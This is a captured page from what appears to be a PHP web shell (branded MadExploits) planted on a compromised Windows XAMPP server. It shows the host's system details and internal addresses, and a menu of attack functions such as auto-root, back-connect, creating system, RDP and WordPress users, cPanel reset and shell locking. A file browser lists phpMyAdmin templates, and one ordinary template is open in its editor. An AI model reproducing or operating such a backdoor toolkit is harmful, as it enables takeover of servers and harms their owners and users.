Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
database /
structure /
[ HOME SHELL ]
Name
Size
Permission
Action
body_for_table_summary.twig
3.25
KB
-rw-rw-rw-
check_all_tables.twig
2.62
KB
-rw-rw-rw-
favorite_anchor.twig
368
B
-rw-rw-rw-
index.twig
635
B
-rw-rw-rw-
show_create.twig
957
B
-rw-rw-rw-
show_create_row.twig
557
B
-rw-rw-rw-
structure_table_row.twig
7.66
KB
-rw-rw-rw-
table_header.twig
3.31
KB
-rw-rw-rw-
tracking_icon.twig
265
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : body_for_table_summary.twig
<tbody id="tbl_summary_row"> <tr> <th class="print_ignore"></th> <th class="tbl_num nowrap"> {% set num_tables_trans -%} {% trans %}%s table{% plural num_tables %}%s tables{% endtrans %} {%- endset %} {{ num_tables_trans|format(format_number(num_tables, 0)) }} </th> {% if server_slave_status %} <th>{% trans 'Replication' %}</th> {% endif %} {% set sum_colspan = db_is_system_schema ? 4 : 7 %} {% if num_favorite_tables == 0 %} {% set sum_colspan = sum_colspan - 1 %} {% endif %} <th colspan="{{ sum_colspan }}" class="print_ignore">{% trans 'Sum' %}</th> {% set row_count_sum = format_number(sum_entries, 0) %} {# If a table shows approximate rows count, display update-all-real-count anchor. #} {% set row_sum_url = [] %} {% if approx_rows is defined %} {% set row_sum_url = { 'ajax_request': true, 'db': db, 'real_row_count': 'true', 'real_row_count_all': 'true' } %} {% endif %} {% if approx_rows %} {% set cell_text -%} <a href="db_structure.php {{- get_common(row_sum_url) }}" class="ajax row_count_sum">~ {{- row_count_sum -}} </a> {%- endset %} {% else %} {% set cell_text = row_count_sum %} {% endif %} <th class="value tbl_rows">{{ cell_text }}</th> {% if not (properties_num_columns > 1) %} {# MySQL <= 5.5.2 #} {% set default_engine = dbi.fetchValue('SELECT @@storage_engine;') %} {% if default_engine is empty %} {# MySQL >= 5.5.3 #} {% set default_engine = dbi.fetchValue('SELECT @@default_storage_engine;') %} {% endif %} <th class="center"> <dfn title="{{ '%s is the default storage engine on this MySQL server.'|trans|format(default_engine) }}"> {{ default_engine }} </dfn> </th> <th> {% if database_collation is not empty %} <dfn title="{{ database_collation.description }} ({% trans 'Default' %})"> {{ database_collation.name }} </dfn> {% endif %} </th> {% endif %} {% if is_show_stats %} {% set sum = format_byte_down(sum_size, 3, 1) %} {% set sum_formatted = sum[0] %} {% set sum_unit = sum[1] %} <th class="value tbl_size">{{ sum_formatted }} {{ sum_unit }}</th> {% set overhead = format_byte_down(overhead_size, 3, 1) %} {% set overhead_formatted = overhead[0] %} {% set overhead_unit = overhead[1] %} <th class="value tbl_overhead">{{ overhead_formatted }} {{ overhead_unit }}</th> {% endif %} {% if show_charset %} <th>{{ database_charset }}</th> {% endif %} {% if show_comment %} <th></th> {% endif %} {% if show_creation %} <th class="value tbl_creation"> {{ create_time_all }} </th> {% endif %} {% if show_last_update %} <th class="value tbl_last_update"> {{ update_time_all }} </th> {% endif %} {% if show_last_check %} <th class="value tbl_last_check"> {{ check_time_all }} </th> {% endif %} </tr> </tbody>
Close